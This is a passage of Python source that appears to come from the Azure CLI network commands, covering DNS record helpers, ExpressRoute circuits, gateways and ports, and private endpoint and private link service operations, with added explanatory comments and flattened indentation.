if (r.flags == record.flags and
r.tag == record.tag and
r.value == record.value):
return True
return False
def _check_cname_record_exist(record, exist_list):
for r in exist_list:
if r.cname == record.cname:
return True
return False
def _check_mx_record_exist(record, exist_list):
for r in exist_list:
if (r.preference == record.preference and
r.exchange == record.exchange):
return True
return False
def _check_ns_record_exist(record, exist_list):
for r in exist_list:
if r.nsdname == record.nsdname:
return True
return False
def _check_ptr_record_exist(record, exist_list):
for r in exist_list:
if r.ptrdname == record.ptrdname:
return True
return False
def _check_srv_record_exist(record, exist_list):
for r in exist_list:
if (r.priority == record.priority and
r.weight == record.weight and
r.port == record.port and
r.target == record.target):
return True
return False
def _check_txt_record_exist(record, exist_list):
for r in exist_list:
if r.value == record.value:
return True
return False
def _record_exist_func(record_type):
return globals()["_check_{}_record_exist".format(record_type)]
def _add_record(record_set, record, record_type, is_list=False):
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is None:
setattr(record_set, record_property, [])
record_list = getattr(record_set, record_property)
_record_exist = _record_exist_func(record_type)
if not _record_exist(record, record_list):
record_list.append(record)
else:
setattr(record_set, record_property, record)
def _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=True, subscription_id=None, ttl=None, if_none_match=None):
from azure.core.exceptions import HttpResponseError
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS,
subscription_id=subscription_id).record_sets
try:
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
except HttpResponseError:
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_set = RecordSet(ttl=3600)
if ttl is not None:
record_set.ttl = ttl
_add_record(record_set, record, record_type, is_list)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name,
record_type, record_set,
if_none_match='*' if if_none_match else None)
def _remove_record(cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set, is_list=True):
ncf = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is not None:
keep_list = [r for r in record_list
if not dict_matches_filter(r.__dict__, record.__dict__)]
if len(keep_list) == len(record_list):
raise CLIError('Record {} not found.'.format(str(record)))
setattr(record_set, record_property, keep_list)
else:
setattr(record_set, record_property, None)
if is_list:
records_remaining = len(getattr(record_set, record_property))
else:
records_remaining = 1 if getattr(record_set, record_property) is not None else 0
if not records_remaining and not keep_empty_record_set:
logger.info('Removing empty %s record set: %s', record_type, record_set_name)
return ncf.delete(resource_group_name, zone_name, record_set_name, record_type)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name, record_type, record_set)
def dict_matches_filter(d, filter_dict):
sentinel = object()
return all(not filter_dict.get(key, None) or
str(filter_dict[key]) == str(d.get(key, sentinel)) or
lists_match(filter_dict[key], d.get(key, []))
for key in filter_dict)
def lists_match(l1, l2):
try:
return Counter(l1) == Counter(l2) # pylint: disable=too-many-function-args
except TypeError:
return False
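# NOTE (editorial): dict_matches_filter treats falsy filter values as wildcards, so only the
# attributes actually supplied on the command line have to match, and lists_match ignores ordering.
# Illustrative-only sketch of the behaviour (values are placeholders):
#     d = {'ipv4_address': '10.0.0.4', 'ttl': 3600}
#     dict_matches_filter(d, {'ipv4_address': '10.0.0.4'})               # True
#     dict_matches_filter(d, {'ipv4_address': '10.0.0.4', 'ttl': None})  # True (None acts as wildcard)
#     dict_matches_filter(d, {'ipv4_address': '10.0.0.5'})               # False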
# endregion
# region ExpressRoutes
def create_express_route(cmd, circuit_name, resource_group_name, bandwidth_in_mbps, peering_location,
service_provider_name, location=None, tags=None, no_wait=False,
sku_family=None, sku_tier=None, allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
ExpressRouteCircuit, ExpressRouteCircuitSku, ExpressRouteCircuitServiceProviderProperties, SubResource = \
cmd.get_models(
'ExpressRouteCircuit', 'ExpressRouteCircuitSku', 'ExpressRouteCircuitServiceProviderProperties',
'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_circuits
sku_name = '{}_{}'.format(sku_tier, sku_family)
circuit = ExpressRouteCircuit(
location=location, tags=tags,
service_provider_properties=ExpressRouteCircuitServiceProviderProperties(
service_provider_name=service_provider_name,
peering_location=peering_location,
bandwidth_in_mbps=bandwidth_in_mbps if not express_route_port else None),
sku=ExpressRouteCircuitSku(name=sku_name, tier=sku_tier, family=sku_family),
allow_global_reach=allow_global_reach,
bandwidth_in_gbps=(int(bandwidth_in_mbps) / 1000) if express_route_port else None
)
if cmd.supported_api_version(min_api='2010-07-01') and allow_classic_operations is not None:
circuit.allow_classic_operations = allow_classic_operations
if cmd.supported_api_version(min_api='2018-08-01') and express_route_port:
circuit.express_route_port = SubResource(id=express_route_port)
circuit.service_provider_properties = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, circuit_name, circuit)
def update_express_route(instance, cmd, bandwidth_in_mbps=None, peering_location=None,
service_provider_name=None, sku_family=None, sku_tier=None, tags=None,
allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
with cmd.update_context(instance) as c:
c.set_param('allow_classic_operations', allow_classic_operations)
c.set_param('tags', tags)
c.set_param('allow_global_reach', allow_global_reach)
with cmd.update_context(instance.sku) as c:
c.set_param('family', sku_family)
c.set_param('tier', sku_tier)
with cmd.update_context(instance.service_provider_properties) as c:
c.set_param('peering_location', peering_location)
c.set_param('service_provider_name', service_provider_name)
if express_route_port is not None:
SubResource = cmd.get_models('SubResource')
instance.express_route_port = SubResource(id=express_route_port)
instance.service_provider_properties = None
if bandwidth_in_mbps is not None:
if not instance.express_route_port:
            instance.service_provider_properties.bandwidth_in_mbps = float(bandwidth_in_mbps)
else:
instance.bandwidth_in_gbps = (float(bandwidth_in_mbps) / 1000)
return instance
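# NOTE (editorial): for provider-based circuits the bandwidth lives under
# service_provider_properties in Mbps, while ExpressRoute Direct (port-based) circuits expose
# bandwidth_in_gbps on the circuit itself; update_express_route above converts Mbps -> Gbps
# accordingly. Rough, assumed CLI usage (resource names are placeholders):
#     az network express-route update -g MyRG -n MyCircuit --bandwidth 1000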
def create_express_route_peering_connection(cmd, resource_group_name, circuit_name, peering_name, connection_name,
peer_circuit, address_prefix, authorization_key=None):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
ExpressRouteCircuitConnection, SubResource = cmd.get_models('ExpressRouteCircuitConnection', 'SubResource')
source_circuit = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='expressRouteCircuits',
name=circuit_name,
child_type_1='peerings',
child_name_1=peering_name
)
conn = ExpressRouteCircuitConnection(
express_route_circuit_peering=SubResource(id=source_circuit),
peer_express_route_circuit_peering=SubResource(id=peer_circuit),
address_prefix=address_prefix,
authorization_key=authorization_key
)
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def _validate_ipv6_address_prefixes(prefixes):
from ipaddress import ip_network, IPv6Network
prefixes = prefixes if isinstance(prefixes, list) else [prefixes]
version = None
for prefix in prefixes:
try:
network = ip_network(prefix)
if version is None:
version = type(network)
else:
if not isinstance(network, version): # pylint: disable=isinstance-second-argument-not-valid-type
raise CLIError("usage error: '{}' incompatible mix of IPv4 and IPv6 address prefixes."
.format(prefixes))
except ValueError:
raise CLIError("usage error: prefix '{}' is not recognized as an IPv4 or IPv6 address prefix."
.format(prefix))
return version == IPv6Network
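# NOTE (editorial): _validate_ipv6_address_prefixes returns True only when every prefix parses as
# IPv6; a single prefix works too because the input is normalised to a list. Illustrative only:
#     _validate_ipv6_address_prefixes(['2001:db8::/64'])                 # True
#     _validate_ipv6_address_prefixes('10.0.0.0/24')                     # False
#     _validate_ipv6_address_prefixes(['10.0.0.0/24', '2001:db8::/64'])  # raises CLIError (mixed versions)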
def create_express_route_peering(
cmd, client, resource_group_name, circuit_name, peering_type, peer_asn, vlan_id,
primary_peer_address_prefix, secondary_peer_address_prefix, shared_key=None,
advertised_public_prefixes=None, customer_asn=None, routing_registry_name=None,
route_filter=None, legacy_mode=None, ip_version='IPv4'):
(ExpressRouteCircuitPeering, ExpressRouteCircuitPeeringConfig, RouteFilter) = \
cmd.get_models('ExpressRouteCircuitPeering', 'ExpressRouteCircuitPeeringConfig', 'RouteFilter')
if cmd.supported_api_version(min_api='2018-02-01'):
ExpressRoutePeeringType = cmd.get_models('ExpressRoutePeeringType')
else:
ExpressRoutePeeringType = cmd.get_models('ExpressRouteCircuitPeeringType')
if ip_version == 'IPv6' and cmd.supported_api_version(min_api='2020-08-01'):
Ipv6ExpressRouteCircuitPeeringConfig = cmd.get_models('Ipv6ExpressRouteCircuitPeeringConfig')
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
microsoft_config = ExpressRouteCircuitPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
else:
microsoft_config = None
ipv6 = Ipv6ExpressRouteCircuitPeeringConfig(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
peering = ExpressRouteCircuitPeering(peering_type=peering_type, ipv6_peering_config=ipv6, peer_asn=peer_asn,
vlan_id=vlan_id)
else:
peering = ExpressRouteCircuitPeering(
peering_type=peering_type, peer_asn=peer_asn, vlan_id=vlan_id,
primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
shared_key=shared_key)
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
peering.microsoft_peering_config = ExpressRouteCircuitPeeringConfig(
advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
if cmd.supported_api_version(min_api='2016-12-01') and route_filter:
peering.route_filter = RouteFilter(id=route_filter)
if cmd.supported_api_version(min_api='2017-10-01') and legacy_mode is not None:
peering.microsoft_peering_config.legacy_mode = legacy_mode
return client.begin_create_or_update(resource_group_name, circuit_name, peering_type, peering)
def _create_or_update_ipv6_peering(cmd, config, primary_peer_address_prefix, secondary_peer_address_prefix,
route_filter, advertised_public_prefixes, customer_asn, routing_registry_name):
if config:
# update scenario
with cmd.update_context(config) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
if route_filter:
RouteFilter = cmd.get_models('RouteFilter')
config.route_filter = RouteFilter(id=route_filter)
else:
# create scenario
IPv6Config, MicrosoftPeeringConfig = cmd.get_models(
'Ipv6ExpressRouteCircuitPeeringConfig', 'ExpressRouteCircuitPeeringConfig')
microsoft_config = MicrosoftPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
config = IPv6Config(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
return config
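# NOTE (editorial): _create_or_update_ipv6_peering is shared by the IPv6 branch of
# update_express_route_peering below: when an ipv6_peering_config already exists only the supplied
# parameters are patched in place, otherwise a fresh Ipv6ExpressRouteCircuitPeeringConfig (with an
# embedded Microsoft peering config) is built from scratch.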
def update_express_route_peering(cmd, instance, peer_asn=None, primary_peer_address_prefix=None,
secondary_peer_address_prefix=None, vlan_id=None, shared_key=None,
advertised_public_prefixes=None, customer_asn=None,
routing_registry_name=None, route_filter=None, ip_version='IPv4',
legacy_mode=None):
# update settings common to all peering types
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('vlan_id', vlan_id)
c.set_param('shared_key', shared_key)
if ip_version == 'IPv6':
# update is the only way to add IPv6 peering options
instance.ipv6_peering_config = _create_or_update_ipv6_peering(cmd, instance.ipv6_peering_config,
primary_peer_address_prefix,
secondary_peer_address_prefix, route_filter,
advertised_public_prefixes, customer_asn,
routing_registry_name)
else:
# IPv4 Microsoft Peering (or non-Microsoft Peering)
with cmd.update_context(instance) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
if route_filter is not None:
RouteFilter = cmd.get_models('RouteFilter')
instance.route_filter = RouteFilter(id=route_filter)
try:
with cmd.update_context(instance.microsoft_peering_config) as c:
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
c.set_param('legacy_mode', legacy_mode)
except AttributeError:
raise CLIError('--advertised-public-prefixes, --customer-asn, --routing-registry-name and '
'--legacy-mode are only applicable for Microsoft Peering.')
return instance
# endregion
# region ExpressRoute Connection
# pylint: disable=unused-argument
def create_express_route_connection(cmd, resource_group_name, express_route_gateway_name, connection_name,
peering, circuit_name=None, authorization_key=None, routing_weight=None,
enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
ExpressRouteConnection, SubResource, RoutingConfiguration, PropagatedRouteTable\
= cmd.get_models('ExpressRouteConnection', 'SubResource', 'RoutingConfiguration', 'PropagatedRouteTable')
client = network_client_factory(cmd.cli_ctx).express_route_connections
propagated_route_tables = PropagatedRouteTable(
labels=labels,
ids=[SubResource(id=propagated_route_table) for propagated_route_table in
propagated_route_tables] if propagated_route_tables else None
)
routing_configuration = RoutingConfiguration(
associated_route_table=SubResource(id=associated_route_table),
propagated_route_tables=propagated_route_tables
)
connection = ExpressRouteConnection(
name=connection_name,
express_route_circuit_peering=SubResource(id=peering) if peering else None,
authorization_key=authorization_key,
routing_weight=routing_weight,
routing_configuration=routing_configuration
)
if enable_internet_security and cmd.supported_api_version(min_api='2019-09-01'):
connection.enable_internet_security = enable_internet_security
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, connection_name, connection)
# pylint: disable=unused-argument
def update_express_route_connection(instance, cmd, circuit_name=None, peering=None, authorization_key=None,
routing_weight=None, enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
SubResource = cmd.get_models('SubResource')
if peering is not None:
        instance.express_route_circuit_peering = SubResource(id=peering)
if authorization_key is not None:
instance.authorization_key = authorization_key
if routing_weight is not None:
instance.routing_weight = routing_weight
if enable_internet_security is not None and cmd.supported_api_version(min_api='2019-09-01'):
instance.enable_internet_security = enable_internet_security
if associated_route_table is not None or propagated_route_tables is not None or labels is not None:
if instance.routing_configuration is None:
RoutingConfiguration = cmd.get_models('RoutingConfiguration')
instance.routing_configuration = RoutingConfiguration()
if associated_route_table is not None:
instance.routing_configuration.associated_route_table = SubResource(id=associated_route_table)
if propagated_route_tables is not None or labels is not None:
if instance.routing_configuration.propagated_route_tables is None:
PropagatedRouteTable = cmd.get_models('PropagatedRouteTable')
instance.routing_configuration.propagated_route_tables = PropagatedRouteTable()
if propagated_route_tables is not None:
instance.routing_configuration.propagated_route_tables.ids = [SubResource(id=propagated_route_table) for propagated_route_table in propagated_route_tables] # pylint: disable=line-too-long
if labels is not None:
instance.routing_configuration.propagated_route_tables.labels = labels
return instance
# endregion
# region ExpressRoute Gateways
def create_express_route_gateway(cmd, resource_group_name, express_route_gateway_name, location=None, tags=None,
min_val=2, max_val=None, virtual_hub=None):
ExpressRouteGateway, SubResource = cmd.get_models('ExpressRouteGateway', 'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_gateways
gateway = ExpressRouteGateway(
location=location,
tags=tags,
virtual_hub=SubResource(id=virtual_hub) if virtual_hub else None
)
    if min_val or max_val:
gateway.auto_scale_configuration = {'bounds': {'min': min_val, 'max': max_val}}
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, gateway)
def update_express_route_gateway(instance, cmd, tags=None, min_val=None, max_val=None):
def _ensure_autoscale():
if not instance.auto_scale_configuration:
ExpressRouteGatewayPropertiesAutoScaleConfiguration, \
ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds = cmd.get_models(
'ExpressRouteGatewayPropertiesAutoScaleConfiguration',
'ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds')
instance.auto_scale_configuration = ExpressRouteGatewayPropertiesAutoScaleConfiguration(
                bounds=ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds(min=min_val, max=max_val))
    if tags is not None:
        instance.tags = tags
    if min_val is not None:
        _ensure_autoscale()
        instance.auto_scale_configuration.bounds.min = min_val
    if max_val is not None:
        _ensure_autoscale()
        instance.auto_scale_configuration.bounds.max = max_val
return instance
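# NOTE (editorial): the auto-scale bounds are only created on demand via _ensure_autoscale, so
# updating a single bound does not wipe the other one. Rough, assumed CLI usage (option names and
# resource names are assumptions):
#     az network express-route gateway update -g MyRG -n MyErGateway --max-val 4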
def list_express_route_gateways(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_gateways
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
# endregion
# region ExpressRoute ports
def create_express_route_port(cmd, resource_group_name, express_route_port_name, location=None, tags=None,
peering_location=None, bandwidth_in_gbps=None, encapsulation=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ExpressRoutePort = cmd.get_models('ExpressRoutePort')
if bandwidth_in_gbps is not None:
bandwidth_in_gbps = int(bandwidth_in_gbps)
port = ExpressRoutePort(
location=location,
tags=tags,
peering_location=peering_location,
bandwidth_in_gbps=bandwidth_in_gbps,
encapsulation=encapsulation
)
return client.begin_create_or_update(resource_group_name, express_route_port_name, port)
def update_express_route_port(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags, True)
return instance
def download_generated_loa_as_pdf(cmd,
resource_group_name,
express_route_port_name,
customer_name,
file_path='loa.pdf'):
import os
import base64
dirname, basename = os.path.dirname(file_path), os.path.basename(file_path)
if basename == '':
basename = 'loa.pdf'
elif basename.endswith('.pdf') is False:
basename = basename + '.pdf'
file_path = os.path.join(dirname, basename)
generate_express_route_ports_loa_request =\
cmd.get_models('GenerateExpressRoutePortsLOARequest')(customer_name=customer_name)
client = network_client_factory(cmd.cli_ctx).express_route_ports
response = client.generate_loa(resource_group_name, express_route_port_name,
generate_express_route_ports_loa_request)
encoded_content = base64.b64decode(response.encoded_content)
from azure.cli.core.azclierror import FileOperationError
try:
with open(file_path, 'wb') as f:
f.write(encoded_content)
except OSError as ex:
raise FileOperationError(ex)
logger.warning("The generated letter of authorization is saved at %s", file_path)
def list_express_route_ports(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def assign_express_route_port_identity(cmd, resource_group_name, express_route_port_name,
user_assigned_identity, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity', 'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance)
ports.identity = identity_instance
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def remove_express_route_port_identity(cmd, resource_group_name, express_route_port_name, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
if ports.identity is None:
logger.warning("The identity of the ExpressRoute Port doesn't exist.")
return ports
ports.identity = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def show_express_route_port_identity(cmd, resource_group_name, express_route_port_name):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
return ports.identity
def update_express_route_port_link(cmd, instance, parent, express_route_port_name, link_name,
macsec_cak_secret_identifier=None, macsec_ckn_secret_identifier=None,
macsec_sci_state=None, macsec_cipher=None, admin_state=None):
"""
:param cmd:
:param instance: an instance of ExpressRoutePort
:param express_route_port_name:
:param link_name:
:param macsec_cak_secret_identifier:
:param macsec_ckn_secret_identifier:
:param macsec_cipher:
:param admin_state:
:return:
"""
if any([macsec_cak_secret_identifier, macsec_ckn_secret_identifier, macsec_cipher, macsec_sci_state]):
instance.mac_sec_config.cak_secret_identifier = macsec_cak_secret_identifier
instance.mac_sec_config.ckn_secret_identifier = macsec_ckn_secret_identifier
# TODO https://github.com/Azure/azure-rest-api-specs/issues/7569
# need to remove this conversion when the issue is fixed.
if macsec_cipher is not None:
macsec_ciphers_tmp = {'gcm-aes-128': 'GcmAes128', 'gcm-aes-256': 'GcmAes256'}
macsec_cipher = macsec_ciphers_tmp.get(macsec_cipher, macsec_cipher)
instance.mac_sec_config.cipher = macsec_cipher
instance.mac_sec_config.sci_state = macsec_sci_state
if admin_state is not None:
instance.admin_state = admin_state
return parent
# endregion
# region PrivateEndpoint
def create_private_endpoint(cmd, resource_group_name, private_endpoint_name, subnet,
private_connection_resource_id, connection_name, group_ids=None,
virtual_network_name=None, tags=None, location=None,
request_message=None, manual_request=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
PrivateEndpoint, Subnet, PrivateLinkServiceConnection = cmd.get_models('PrivateEndpoint',
'Subnet',
'PrivateLinkServiceConnection')
pls_connection = PrivateLinkServiceConnection(private_link_service_id=private_connection_resource_id,
group_ids=group_ids,
request_message=request_message,
name=connection_name)
private_endpoint = PrivateEndpoint(
location=location,
tags=tags,
subnet=Subnet(id=subnet)
)
if manual_request:
private_endpoint.manual_private_link_service_connections = [pls_connection]
else:
private_endpoint.private_link_service_connections = [pls_connection]
if edge_zone:
private_endpoint.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
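# NOTE (editorial): when a manual request is used the connection lands in
# manual_private_link_service_connections and stays pending until the service owner approves it;
# otherwise private_link_service_connections is used and auto-approval rules apply. Rough, assumed
# CLI usage (option names and identifiers are placeholders/assumptions):
#     az network private-endpoint create -g MyRG -n MyPe --vnet-name MyVnet --subnet MySubnet \
#         --private-connection-resource-id $PLS_ID --connection-name MyConn --group-id sqlServer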
def update_private_endpoint(instance, cmd, tags=None, request_message=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
if request_message is not None:
if instance.private_link_service_connections:
instance.private_link_service_connections[0].request_message = request_message
else:
instance.manual_private_link_service_connections[0].request_message = request_message
return instance
def list_private_endpoints(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def create_private_endpoint_private_dns_zone_group(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneGroup, PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneGroup', 'PrivateDnsZoneConfig')
private_dns_zone_group = PrivateDnsZoneGroup(name=private_dns_zone_group_name,
private_dns_zone_configs=[PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, # pylint: disable=line-too-long
name=private_dns_zone_name)]) # pylint: disable=line-too-long
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneConfig')
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone = PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, name=private_dns_zone_name)
private_dns_zone_group.private_dns_zone_configs.append(private_dns_zone)
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def remove_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone_configs = [item for item in private_dns_zone_group.private_dns_zone_configs if item.name != private_dns_zone_name] # pylint: disable=line-too-long
private_dns_zone_group.private_dns_zone_configs = private_dns_zone_configs
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
# endregion
# region PrivateLinkService
def create_private_link_service(cmd, resource_group_name, service_name, subnet, frontend_ip_configurations,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
virtual_network_name=None, public_ip_address=None,
location=None, tags=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None,
enable_proxy_protocol=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
FrontendIPConfiguration, PrivateLinkService, PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = \
cmd.get_models('FrontendIPConfiguration', 'PrivateLinkService', 'PrivateLinkServiceIpConfiguration',
'PublicIPAddress', 'Subnet')
pls_ip_config = PrivateLinkServiceIpConfiguration(
name='{}_ipconfig_0'.format(service_name),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service = PrivateLinkService(
location=location,
load_balancer_frontend_ip_configurations=frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
],
ip_configurations=[pls_ip_config],
        visibility=visibility,
auto_approval=auto_approval,
fqdns=fqdns,
tags=tags,
enable_proxy_protocol=enable_proxy_protocol
)
if edge_zone:
link_service.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def update_private_link_service(instance, cmd, tags=None, frontend_ip_configurations=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None, enable_proxy_protocol=None):
FrontendIPConfiguration = cmd.get_models('FrontendIPConfiguration')
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('load_balancer_frontend_ip_configurations', frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
])
c.set_param('visibility', visibility)
c.set_param('auto_approval', auto_approval)
c.set_param('fqdns', fqdns)
c.set_param('enable_proxy_protocol', enable_proxy_protocol)
return instance
def list_private_link_services(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def update_private_endpoint_connection(cmd, resource_group_name, service_name, pe_connection_name,
connection_status, description=None, action_required=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateEndpointConnection, PrivateLinkServiceConnectionState = cmd.get_models('PrivateEndpointConnection',
'PrivateLinkServiceConnectionState')
connection_state = PrivateLinkServiceConnectionState(
status=connection_status,
description=description,
actions_required=action_required
)
pe_connection = PrivateEndpointConnection(
private_link_service_connection_state=connection_state
)
return client.update_private_endpoint_connection(resource_group_name, service_name, pe_connection_name, pe_connection) # pylint: disable=line-too-long
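# NOTE (editorial): update_private_endpoint_connection backs approving/rejecting a pending
# connection on a private link service; only the connection-state object is sent. Rough, assumed
# CLI usage (option names and resource names are assumptions):
#     az network private-link-service connection update -g MyRG --service-name MyPls \
#         -n MyConnection --connection-status Approved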
def add_private_link_services_ipconfig(cmd, resource_group_name, service_name,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
subnet=None, virtual_network_name=None, public_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = cmd.get_models('PrivateLinkServiceIpConfiguration',
'PublicIPAddress',
'Subnet')
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_name_index = len(link_service.ip_configurations)
ip_config = PrivateLinkServiceIpConfiguration(
name='{0}_ipconfig_{1}'.format(service_name, ip_name_index),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def remove_private_link_services_ipconfig(cmd, resource_group_name, service_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_link_services
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_config = None
for item in link_service.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None: # pylint: disable=no-else-return
logger.warning("%s ip configuration doesn't exist", ip_config_name)
return link_service
else:
link_service.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
# endregion
